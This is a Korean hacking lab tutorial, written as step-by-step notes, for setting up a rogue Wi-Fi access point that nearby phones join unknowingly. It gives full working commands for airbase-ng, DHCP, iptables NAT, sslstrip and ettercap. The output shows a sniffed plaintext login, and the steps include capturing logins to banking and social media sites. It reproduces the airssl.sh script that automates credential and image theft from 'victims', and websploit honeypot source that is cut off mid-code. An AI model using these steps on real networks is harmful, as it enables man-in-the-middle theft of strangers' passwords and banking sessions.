Fake AP 구성
무선랜을 해킹한 후 Fake AP로 구성해서 오픈형태로 구성한다. 핸드폰들이 자동으로 붙게하고 인터넷을 사용할 수 있도록 한다. WIFI가 우선순위가 높아서 먼저 붙게되는데 이것을 이용한다. 자신도 모르는 상태에서 통신하게 된다. 커피숍 WIFI 비밀번호를 크랙해서 붙혀놓고 칼리리눅스를 Soft AP로 구성해서 오픈해놓는다. 다른사람들은 이것을 통해 인터넷을 하게 되는데 패킷을 ARP Spoofig이 된것처럼 동작된다.
(주의) wlan#/mon# 으로 설정되는 무선랜만 실습을 할 수 있습니다. /* 이런식의 이름이 아니면 변형해서 사용
(실습전 작업)
# airmon-ng stop mon0
# service network-manager restart
# service networking restart
① 인테넷이 되는지 확인
# cat /etc/resolv.conf
|
nameserver 168.126.63.1 |
# nslookup www.daum.net
|
Server: 192.168.10.2 Address: 192.168.10.2#53 Non-authoritative answer: www.daum.net canonical name = www.g.daum.net. Name: www.g.daum.net Address: 117.52.2.237 Name: www.g.daum.net Address: 117.52.2.238 |
# apt-cachee search dhcp /* dhcp 검색
② DHCP 서버 프로그램 설치 /* Soft AP는 DHCP기능으로 client에게 IP를 줄 수 있어야 한다.
# apt-get -y install isc-dhcp-server
|
패키지 목록을 읽는 중입니다... 완료 의존성 트리를 만드는 중입니다 상태 정보를 읽는 중입니다... 완료 주의, 'dhcp3-server' 대신에 'isc-dhcp-server' 패키지를 선택합니다 제안하는 패키지: isc-dhcp-server-ldap 다음 새 패키지를 설치할 것입니다: isc-dhcp-server 0개 업그레이드, 1개 새로 설치, 0개 제거 및 173개 업그레이드 안 함. 936 k바이트 아카이브를 받아야 합니다. 이 작업 후 2,225 k바이트의 디스크 공간을 더 사용하게 됩니다. 경고: 다음 패키지를 인증할 수 없습니다! isc-dhcp-server 확인하지 않고 패키지를 설치하시겠습니까 [y/N]? y 받기:1 http://http.kali.org/kali/ kali/main isc-dhcp-server i386 4.2.2.dfsg.1-5+deb70u6 [936 kB] 내려받기 936 k바이트, 소요시간 10초 (88.0 k바이트/초) 패키지를 미리 설정하는 중입니다... Selecting previously unselected package isc-dhcp-server. (데이터베이스 읽는중 ...현재 349119개의 파일과 디렉터리가 설치되어 있습니다.) isc-dhcp-server 패키지를 푸는 중입니다 (.../isc-dhcp-server_4.2.2.dfsg.1-5+deb70u6_i386.deb에서) ... man-db에 대한 트리거를 처리하는 중입니다 ... isc-dhcp-server (4.2.2.dfsg.1-5+deb70u6) 설정하는 중입니다 ... Generating /etc/default/isc-dhcp-server... update-rc.d: We have no instructions for the isc-dhcp-server init script. update-rc.d: It looks like a network service, we disable it. .... (중략) ..... |
[참고] isc-dhcp-server 설정 파일들
/etc/dhcp/dhcpd.conf 주 설정 파일
/etc/init.d/isc-dhcp-server 서비스 관리 스크립트(start/stop/restart)
/etc/default/isc-dhcp-server 데몬이 읽어 들이는 기본 변수 설정 파일
/usr/sbin/dhcpd dhcpd 데몬
/var/run/dhcpd.pid dhpcd 데몬 기동시 PID 번호 저장 파일
# dpkg -L isc-dhcp-server
|
/. /var /var/run /var/lib /var/lib/dhcp /etc /etc/dhcp /etc/dhcp/dhcpd.conf /* 주설정 파일 /etc/init.d /etc/init.d/isc-dhcp-server /* 기동시키는 스타팅 스크립트 /usr /usr/share /usr/share/doc /usr/share/doc/isc-dhcp-server /usr/share/doc/isc-dhcp-server/copyright /usr/share/doc/isc-dhcp-server/README.Debian /usr/share/doc/isc-dhcp-server/NEWS.Debian.gz /usr/share/doc/isc-dhcp-server/changelog.Debian.gz /usr/share/doc/isc-dhcp-server/examples /usr/share/doc/isc-dhcp-server/examples/dhcpd.conf /usr/share/man /usr/share/man/man8 /usr/share/man/man8/dhcpd.8.gz /usr/share/man/man5 /usr/share/man/man5/dhcpd.conf.5.gz /usr/share/man/man5/dhcpd.leases.5.gz /usr/share/lintian /usr/share/lintian/overrides /usr/share/lintian/overrides/isc-dhcp-server /usr/sbin /usr/sbin/dhcpd /* 데몬 이름 |
③ 무선 랜 네트워크 설정 정보 확인
칼리리눅스
Gateway -------------- eth0 (Fake 무선 AP) wlan1(mon0/at0) ----- (핸드폰)
192.168.10.2 192.168.10.50 192.168.100.1 192.168.100.X
- wlan1을 무선으로 잡고 핸드폰이 wlan1과 eth0를 거쳐서 Gateway로 나가게 된다.
■ Fake AP 기능
- (ㄱ) Fake AP /* 핸드폰이 AP이름을 검색할 수 있어야 한다.
- (ㄴ) DHCP Server /* 핸드폰이 AP를 클릭하면 커넥션을 요청하는데 서버에서 IP를 제공해줘야 한다.
- (ㄷ) NAT(+ routing table 설정 + ip forwarding) /* IP가 사설IP로 일반적으로 할당되는데 나를 통해서 외부로 나갈 수 있도록 필요하다. 내부에서 외부로 나갈때 사용하고 외부에서 내부로 올떄는 라우팅에서 작업을 해줘야한다.
# ifconfig
|
eth0 Link encap:Ethernet HWaddr 00:0c:29:13:97:4a inet addr:192.168.10.50 Bcast:192.168.10.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe13:974a/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:88 errors:0 dropped:0 overruns:0 frame:0 TX packets:102 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:9272 (9.0 KiB) TX bytes:12273 (11.9 KiB) Interrupt:19 Base address:0x2000 eth1 Link encap:Ethernet HWaddr 00:0c:29:13:97:54 inet addr:192.168.20.50 Bcast:192.168.20.255 Mask:255.255.255.0 inet6 addr: fe80::20c:29ff:fe13:9754/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:18 errors:0 dropped:0 overruns:0 frame:0 TX packets:19 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:1319 (1.2 KiB) TX bytes:1270 (1.2 KiB) Interrupt:19 Base address:0x2080 lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:65536 Metric:1 RX packets:12 errors:0 dropped:0 overruns:0 frame:0 TX packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:720 (720.0 B) TX bytes:720 (720.0 B) wlan1 Link encap:Ethernet HWaddr 00:08:9f:f2:9c:19 UP BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) |
(필요하면 명령어 수행)
# ifconfig /* 활성화된 카드만 보이기 떄문에 down시키면 보이지 않는다.
# ifconfig -a /* 활성화/비활성화 카드 모두 보여준다.
# ifconfig wlan1 up
# iwconfig
# ifconfig eth1 down
# ifconfig
④ DHCP 서버 설정
-------------------------------------------
(Debian 계열) (RedHat 계열)
-------------------------------------------
# dpkg -l # rpm -qa
# dpkg -L isc-dhcp-server # rpm -ql <PKG>
-------------------------------------------
# cd /etc/dhcp
# mv dhcpd.conf dhcpd.conf.old /* 주설정 파일
# vi /etc/dhcp/dhcpd.conf
|
authoritative; default-lease-time 600; /* 초단위로 설정 max-lease-time 7200; /* lease-time - DHCP Server가 제공할때 시간을 정해준다. /* 연장하다 연장하다 MAX값에 도달하면 expire된다. subnet 192.168.100.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.100.255; option routers 192.168.100.1; /* Wlan1의 주소 option domain-name "free1"; /* FAKE AP의 이름으로 핸드폰이 바라볼 때 option domain-name-servers 192.168.100.1; range 192.168.100.2 192.168.100.254; } /* 다양한 정보를 제공하며, 제어할 수 있도록 Host이름 등 다양한값 가능 |
Gateway -------------- eth0 (Fake 무선 AP) wlan1(mon0/at0) ----- (핸드폰)
192.168.10.2 192.168.10.50 192.168.100.1 192.168.100.X
[참고] Caching Only DNS Server 구축
# apt-get -y install bind9 bind9-doc bind9-host bind9utils
# service bind9 restart
# service bind9 status
-설치하고 시작만하면 Caching Only DNS Server가 된다.
⑤ wlan# 인터페이스 모니터 모드로 전환
# airmon-ng start wlan1
|
Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! -e PID Name 11735 NetworkManager 11755 wpa_supplicant Interface Chipset Driver wlan0 Ralink RT2870/3070 rt2800usb - [phy1] (monitor mode enabled on mon0) |
# airmon-ng check kill (# kill 11735 11755)
|
Found 2 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! -e PID Name 11735 NetworkManager 11755 wpa_supplicant Killing all those processes... |
# iwconfig
|
lo no wireless extensions. mon0 IEEE 802.11bgn Mode:Monitor Frequency:2.412 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off eth0 no wireless extensions. eth1 no wireless extensions. wlan1 IEEE 802.11bgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off |
⑥ FakeAP 구성
Gateway -------------- eth0 (Fake 무선 AP) wlan1(mon0/at0) ----- (핸드폰)
192.168.10.2 192.168.10.50 192.168.100.1 192.168.100.X
- wlan1을 무선으로 잡고 핸드폰이 wlan1과 eth0를 거쳐서 Gateway로 나가게 된다.
■ Fake AP 기능
- (ㄱ) Fake AP
- (ㄴ) DHCP Server
- (ㄷ) NAT(+ routing table 설정 + ip forwarding)
# airbase-ng -c 4 --essid free1 mon0 /* 다른 무선 AP가 잘 사용하지 않는 채널을 선택 */
/* essid 사용자가 보여지는 이름
|
18:07:04 Created tap interface at0 18:07:04 Trying to set MTU on at0 to 1500 18:07:04 Trying to set MTU on mon0 to 1800 18:07:04 Access Point with BSSID 00:08:9F:F2:9C:19 started. |
-AP 띄어논것이기 때문에 종료시키면 안된다.
airbase-ng - multi-purpose tool aimed at attacking clients as opposedto the Access Point (AP) itself
-a bssid : set Access Point MAC address
-c channel : sets the channel the AP is running on
--essid ESSID : specify a single ESSID (default: default)
-W 0|1 : [don't] set WEP flag in beacons 0|1 (default: auto)
(핸드폰에서) 핸드폰에서 free1 이름을 가진 fake AP 확인
-DHCP는 구성했으나 데몬을 구성하지 않아서 아직 접속할 수 없다.
[TERM2] 새로운 터미널
# iwconfig
|
wlan0 IEEE 802.11abgn ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off
lo no wireless extensions. mon0 IEEE 802.11abgn Mode:Monitor Frequency:2.427 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off
eth0 no wireless extensions. eth1 no wireless extensions. at0 no wireless extensions. /* Soft AP 가상카드 |
-> at0 확인
# ifconfig at0 up
# ifconfig at0
|
at0 Link encap:Ethernet HWaddr 3c:a3:15:02:6a:de inet6 addr: fe80::3ea3:15ff:fe02:6ade/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:6 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 RX bytes:0 (0.0 B) TX bytes:508 (508.0 B) ..... (중략) ..... |
# ifconfig at0 192.168.100.1 netmask 255.255.255.0
# ifconfig at0 mtu 1400
# ifconfig at0
|
at0 Link encap:Ethernet HWaddr 00:08:9f:f2:9c:19 inet addr:192.168.100.1 Bcast:192.168.100.255 Mask:255.255.255.0 inet6 addr: fe80::208:9fff:fef2:9c19/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1400 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 RX bytes:0 (0.0 B) TX bytes:648 (648.0 B) |
# route add -net 192.168.100.0 netmask 255.255.255.0 gw 192.168.100.1
/* networkt IP
-VM안쪽에서 밖으로는 통신이 잘되나, 윈도우에서 VM안쪽으로 안되는 경우가 있다. 라우팅테이블에 등록이 안되있어서 그런거다.
# route -n (# netstat -nr)
|
Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 192.168.10.2 0.0.0.0 UG 0 0 0 eth0 192.168.10.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 192.168.20.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1 192.168.100.0 192.168.100.1 255.255.255.0 UG 0 0 0 at0 192.168.100.0 0.0.0.0 255.255.255.0 U 0 0 0 at0 |
# echo 1 > /proc/sys/net/ipv4/ip_forward (# sysctl -w net.ipv4.ip_forward=1 ; sysctl -p)
-> IPv4 Forwarding 기능 ON
# iptables -F (# iptables --flush)
-> filter table(default table)의 rule 정보 flush
# iptables -t nat -F (# iptables --table nat --flush)
-> nat table의 rule 정보 flush
# iptables -X (# iptables --delete-chain)
-> filter table(default table)의 새로 선언된 chain 삭제
# iptables -t nat -X (# iptables --table nat --delete-chain)
-> nat table의 새로 선언된 chain 삭제
# route -n
|
Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 0.0.0.0 192.168.10.2 0.0.0.0 UG 0 0 0 eth0 192.168.10.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0 192.168.20.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1 192.168.100.0 192.168.100.1 255.255.255.0 UG 0 0 0 at0 192.168.100.0 0.0.0.0 255.255.255.0 U 0 0 0 at0 |
# iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.10.2
# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
/* nat table, Append, tcp , 80port, 10000port로 변경시키겠다. 10000으로 rediect한다. ssltrip이 10000에서 대기하고 있다.
(# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000)
# iptables -P FORWARD ACCEPT /* -P : policy */
-> Forward Chain에 기본 정책을 ACCEPT으로 설정
# iptables -A FORWARD -i at0 -j ACCEPT /* -i : in-bound device, -j : jump */
-> Forward Chain에 rule 추가
(# iptables --append FORWARD --in-interface at0 -j ACCEPT)
# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE /* -o : out-bound device */
-> nat table의 POSTROUTING Chain에 rule 추가(마스커레이딩 설정) /* NAT Table같은 것을 만들겠다.
(# iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE)
# iptables -L
|
Chain INPUT (policy ACCEPT) target prot opt source destination Chain FORWARD (policy ACCEPT) target prot opt source destination ACCEPT all -- anywhere anywhere Chain OUTPUT (policy ACCEPT) target prot opt source destination |
# iptables -L -t nat
|
Chain PREROUTING (policy ACCEPT) target prot opt source destination DNAT udp -- anywhere anywhere to:192.168.10.2 REDIRECT tcp -- anywhere anywhere tcp dpt:http redir ports 10000 Chain INPUT (policy ACCEPT) target prot opt source destination Chain OUTPUT (policy ACCEPT) target prot opt source destination Chain POSTROUTING (policy ACCEPT) target prot opt source destination MASQUERADE all -- anywhere anywhere |
# service isc-dhcp-server start
(dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0)
|
[FAIL] Stopping ISC DHCP server: dhcpd failed! [ ok ] Starting ISC DHCP server: dhcpd. |
# pgrep -lf dhcpd
|
4803 /usr/sbin/dhcpd -q -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid |
-> 떠 있는 데몬 확인
# sslstrip -f -p -k 10000
|
sslstrip 0.9 by Moxie Marlinspike running...
|
- 종료하면 안된다.
sslstrip - SSL/TLS man-in-the-middle attack tool
-f , --favicon Substitute a lock favicon on secure requests.
-p , --post Log only SSL POSTs. (default)
-k , --killsessions Kill sessions in progress.
[TERM3] 다른 터미널
# man ettercap
Sniffing and Attack options:
-p, --nopromisc do not put the iface in promisc mode
-u, --unoffensive do not forward packets
User Interface Type:
-T, --text use text only GUI
-q, --quiet do not display packet contents
General options:
-i, --iface <iface> use this network interface
# ettercap -p -u -T -q -i at0 /* Text방식으로
|
ettercap 0.8.0 copyright 2001-2013 Ettercap Development Team Listening on: at0 -> 00:00:00:00:00:00 192.168.100.1/255.255.255.0 fe80::66e5:99ff:fef2:c59d/64 Privileges dropped to UID 65534 GID 65534... 33 plugins 42 protocol dissectors 57 ports monitored 16074 mac vendor fingerprint 1766 tcp OS fingerprint 2182 known services Starting Unified sniffing... Text only Interface activated... Hit 'h' for inline help
DHCP: [08:3D:88:1E:79:FD] DISCOVER DHCP: [192.168.100.1] OFFER : 192.168.100.2 255.255.255.0 GW 192.168.100.1 DNS 192.168.100.1 "free1" DHCP: [08:3D:88:1E:79:FD] REQUEST 192.168.100.2 DHCP: [192.168.100.1] ACK : 192.168.100.2 255.255.255.0 GW 192.168.100.1 DNS 192.168.100.1 "free1" HTTP : 110.45.215.107:80 -> USER: jang4scjaja PASS: n1 INFO: http://www.daum.net/ CONTENT: url=http%3A%2F%2Fwww.daum.net%2F%3Ft__nil_top%3Dlogin&weblogin=1&slevel=1&id=jang4scjaja&pw=n1 ..... (중략) ..... |
DHCP DISCOVER - DHCP Server를 Broadcast방식으로 검색한다.
DHCP OFFER - 내가 DHCP Server다 알려준다.
DHCP REQUEST - DHCP 정보좀 달라고 요청한다.
DHCP ACK - 유니캐스트로 정보를 전송해준다.
= 결론 - 실제 IP를 받았다는 뜻
(주의) wlan1 비활성화 되어 있으면 반드시 활성화를 시킨다.
# ifconfig
# ifconfig -a
# ifconfig wlan1 up
(핸드폰에서) 무선을 잡고 인터넷을 해본다.(naver 웹에 로그인)
Quick System Information 앱을 통해 할당 받은 네트워크 정보를 확인한다.
-> 로그인 과정을 거친다.
-> ettercap 화면을 확인한다.
facebook.com
-> 로그인 과정을 거친다.
-> ettercap 화면을 확인한다.
wordpress.com
-> 로그인 과정을 거친다.
-> ettercap 화면을 확인한다.
www.chase.com (온라인 뱅킹)
-> 로그인 과정을 거친다.
-> ettercap 화면을 확인한다.
# cat sslstrip.log
-> 로그 파일을 확인한다.
=> sslstrip을 통해 평문형태로 패킷들을 볼 수 있다. 은행업무같은 것을 하면
[참고] 유투브 동영상
https://www.youtube.com/watch?v=HePt2J4uSno(추천)
https://www.youtube.com/watch?v=dA-i7jAVwMs
[참고] 유투브 동영상
https://www.youtube.com/watch?v=CdqhNN1OfHY
- Fake Wireless Access Point Creation-Rogue AP (HD)
- (FakeAP.sh source code : https://github.com/hacker404/Air-sslstrip-/blob/master/Air-ssl.sh)
■ FakeAP.sh 스크립트 /* Fake AP를 구성하는 스크립트로 참고해서 만들어보자
|
#!/bin/bash # (C)opyright 2009 - killadaninja - Modified H4m4d4 2014 # airssl.sh - v1.0 # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh # configure your Network # Network questions echo echo "AIRSSL 2.0 - Credits killadaninja & h4m4d4 " echo route -n -A inet | grep UG
echo echo echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: " read -e gatewayip echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: " read -e internet_interface echo -n "Enter your interface to be used for the fake AP, for example wlan0: " read -e fakeap_interface echo -n "Enter the ESSID you would like your rogue AP to be called: " read -e ESSID airmon-ng start $fakeap_interface /* monitor모드로 전환한다. fakeap=$fakeap_interface fakeap_interface="mon0"
# Dhcpd creation mkdir -p "/pentest/wireless/airssl" echo "authoritative; default-lease-time 600; max-lease-time 7200; subnet 10.0.0.0 netmask 255.255.255.0 { option routers 10.0.0.1; option subnet-mask 255.255.255.0; option domain-name "\"$ESSID\""; option domain-name-servers 10.0.0.1; range 10.0.0.20 10.0.0.50; }" > /pentest/wireless/airssl/dhcpd.conf /* 위 내용을 집어 넣었다.
# Fake ap setup echo "[+] Configuring FakeAP...." echo echo "Airbase-ng will run in its most basic mode, would you like to configure any extra switches? " echo echo "Choose Y to see airbase-ng help and add switches. " echo "Choose N to run airbase-ng in basic mode with your choosen ESSID. " echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your choosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and victim will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. " echo "Y, N or A "
read ANSWER
if [ $ANSWER = "y" ] ; then airbase-ng --help fi
if [ $ANSWER = "y" ] ; then echo echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be redefined, also in this mode you MUST define a channel " read -e aswitch echo echo "[+] Starting FakeAP..." xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$! sleep 2 fi /* xterm이란 명령어로 새로운 터미널을 띄운다.
if [ $ANSWER = "a" ] ; then echo echo "[+] Starting FakeAP..." xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$! sleep 2 fi
if [ $ANSWER = "n" ] ; then echo echo "[+] Starting FakeAP..." xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$! sleep 2 fi
# Tables echo "[+] Configuring forwarding tables..." ifconfig lo up ifconfig at0 up & sleep 1 ifconfig at0 10.0.0.1 netmask 255.255.255.0 ifconfig at0 mtu 1400 route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip iptables -P FORWARD ACCEPT iptables --append FORWARD --in-interface at0 -j ACCEPT iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
# DHCP echo "[+] Setting up DHCP..." touch /var/run/dhcpd.pid chown dhcpd:dhcpd /var/run/dhcpd.pid xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$! sleep 3
# Sslstrip echo "[+] Starting sslstrip..." xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$! sleep 2
# Ettercap echo "[+] Configuring ettercap..." echo echo "Ettercap will run in its most basic mode, would you like to configure any extra switches for example to load plugins or filters, (advanced users only), if you are unsure choose N " echo "Y or N " read ETTER if [ $ETTER = "y" ] ; then ettercap --help fi
if [ $ETTER = "y" ] ; then echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here For the sake of airssl, ettercap WILL USE -u and -p so you are advised NOT to use -M, also -i is already set and CANNOT be redifined here. Ettercaps output will be saved to /pentest/wireless/airssl/passwords DO NOT use the -w switch, also if you enter no switches here ettercap will fail " echo read "eswitch" echo "[+] Starting ettercap..." xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$! sleep 1 /* ettercap 띄우는 부분 fi
if [ $ETTER = "n" ] ; then echo echo "[+] Starting ettercap..." xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$! sleep 1 fi
# Driftnet echo echo "[+] Driftnet?" echo echo "Would you also like to start driftnet to capture the victims images, (this may make the network a little slower), " echo "Y or N " read DRIFT
if [ $DRIFT = "y" ] ; then mkdir -p "/pentest/wireless/airssl/driftnetdata" /* Client 웹페이지 이미지 보려고 echo "[+] Starting driftnet..." driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$! sleep 3 fi
xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
clear echo echo "[+] Activated..." echo "Airssl is now running, after victim connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercaps xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftftnetdata " echo echo "[+] IMPORTANT..." echo "After you have finished please close airssl and clean up properly by hitting Y, if airssl is not closed properly ERRORS WILL OCCUR " read WISH
# Clean up if [ $WISH = "y" ] ; then echo echo "[+] Cleaning up airssl and resetting iptables..."
kill ${fakeapid} kill ${dchpid} kill ${sslstripid} kill ${ettercapid} kill ${dritnetid} kill ${sslstriplogid} /* 원래 상태로 복원하는 부분
airmon-ng stop $fakeap_interface airmon-ng stop $fakeap echo "0" > /proc/sys/net/ipv4/ip_forward iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain
echo "[+] Clean up successful..." echo "[+] Thank you for using airssl, Good Bye..." exit
fi exit |
= 새로운창을 띄어주고 닫아주고 아주 간편하게 작성되어있다. 입력값만 정확히 적어주면 된다.
[참고] FakeAP 구성하는 쉬운 방법(websploit)
# websploit /* Web쪽 전문적으로 사용
|
db d8b db d88888b d8888b. .d8888. d8888b. db .d88b. d888888b d888888b 88 I8I 88 88' 88 `8D 88' YP 88 `8D 88 .8P Y8. `88' `~~88~~' 88 I8I 88 88ooooo 88oooY' `8bo. 88oodD' 88 88 88 88 88 Y8 I8I 88 88~~~~~ 88~~~b. `Y8b. 88~~~ 88 88 88 88 88 `8b d8'8b d8' 88. 88 8D db 8D 88 88booo. `8b d8' .88. 88 `8b8' `8d8' Y88888P Y8888P' `8888Y' 88 Y88888P `Y88P' Y888888P YP --=[WebSploit FrameWork +---**---==[Version :2.0.5 BETA +---**---==[Codename :We're Not Crying Wolf +---**---==[Available Modules : 19 --=[Update Date : [r2.0.5-000 2.3.2014]
wsf > show modules
Web Modules Description ------------------- --------------------- web/apache_users Scan Directory Of Apache Users web/dir_scanner Directory Scanner web/wmap Information Gathering From Victim Web Using (Metasploit Wmap) web/pma PHPMyAdmin Login Page Scanner web/cloudflare_resolver CloudFlare Resolver Network Modules Description ------------------- --------------------- network/arp_dos ARP Cache Denial Of Service Attack network/mfod Middle Finger Of Doom Attack network/mitm Man In The Middle Attack network/mlitm Man Left In The Middle Attack network/webkiller TCP Kill Attack network/fakeupdate Fake Update Attack Using DNS Spoof network/arp_poisoner Arp Poisoner Exploit Modules Description ------------------- --------------------- exploit/autopwn Metasploit Autopwn Service exploit/browser_autopwn Metasploit Browser Autopwn Service exploit/java_applet Java Applet Attack (Using HTML) Wireless / Bluetooth Modules Description ------------------- --------------------- wifi/wifi_jammer Wifi Jammer wifi/wifi_dos Wifi Dos Attack wifi/wifi_honeypot Wireless Honeypot(Fake AP) bluetooth/bluetooth_pod Bluetooth Ping Of Death Attack
wsf > use wifi/wifi_honeypot wsf:Wifi_Honeypot > show options
Options Value RQ Description --------- -------------- ---- -------------- interface wlan0 yes Wireless Interface Name essid FreeNet yes FakeAP Essid channel 9 yes FakeAP Channel mac a1:a2:a3:a4:a5:a6 yes FakeAP Mac Address output /tmp/10.txt yes Log File Location /* 저장위치 mon mon0 yes Monitor Mod(default) /* 카드이름 encrypt 1 yes Type Of Encryptions Numbers Encryptions ------- -------------- 1 Unencrypted 2 wep 3 wpa 4 wpa2
wsf:Wifi_Honeypot > run .... (생략) ..... |
(필요하면 명령어 수행)
wsf> <CTRL + Z>
# kill %1
(핸드폰) 핸드폰에서 무선 AP를 확인한다.
# cd /usr/share/webspolit
# ls
|
core/ modules/ |
# cd modules
# ls
|
__init__.py bluetooth_pod.pyc mfod.py wifi_dos.py __init__.pyc brow_autopwn.py mfod.pyc wifi_dos.pyc apache_users.py brow_autopwn.pyc mitm.py wifi_honeypot.py apache_users.pyc cloudflare_resolver.py mitm.pyc wifi_honeypot.pyc arp_dos.py cloudflare_resolver.pyc mlitm.py wifi_honeypot2.py arp_dos.pyc db_autopwn.rb mlitm.pyc wifi_jammer.py arp_poisoner.py directory_scanner.py phpmyadmin.py wifi_jammer.pyc arp_poisoner.pyc directory_scanner.pyc phpmyadmin.pyc wmap.py autopwn.py fakeupdate/ thebiz.py wmap.pyc autopwn.pyc java_applet.py webkiller.py bluetooth_pod.py java_applet.pyc webkiller.pyc |
- python script로 작성이 되어 있다.
# vi wifi_honeypot.py
|
#!/usr/bin/env python # # WebSploit Framework Wifi Honeypot (Fake Access Point) module # Created By 0x0ptim0us (Fardin Allahverdinazhand) # Email : 0x0ptim0us@Gmail.Com import os import subprocess from time import sleep from core import help from core import wcolors
options = ["wlan0", "FreeNet", "9", "a1:a2:a3:a4:a5:a6", "/home/wh_logs.txt", "mon0", "1"] /* 기본값
def wifi_honeypot(): /* 함수선언 try: line_1 = wcolors.color.UNDERL + wcolors.color.BLUE + "wsf" + wcolors.color.ENDC line_1 += ":" line_1 += wcolors.color.UNDERL + wcolors.color.BLUE + "Wifi_Honeypot" + wcolors.color.ENDC line_1 += " > " com = raw_input(line_1) com = com.lower() if com[0:13] == 'set interface': options[0] = com[14:20] print "INTERFACE => ", options[0] wifi_honeypot() elif com[0:9] == 'set essid': options[1] = com[10:] print "ESSID => ", options[1] wifi_honeypot() elif com[0:11] == 'set channel': options[2] = com[12:14] print "CHANNEL => ", options[2] wifi_honeypot() elif com[0:7] == 'set mac': options[3] = com[8:25] print "MAC => ", options[3] wifi_honeypot() elif com[0:10] == 'set output': options[4] = com[11:] print "OUTPUT => ", options[4] wifi_honeypot() elif com[0:7] == 'set mon': options[5] = com[8:12] print "MON => ", options[5] wifi_honeypot() elif com[0:11] =='set encrypt': options[6] = com[12:13] print "ENCRYPT => ", options[6] wifi_honeypot() elif com[0:2] =='os': os.system(com[3:]) wifi_honeypot() elif 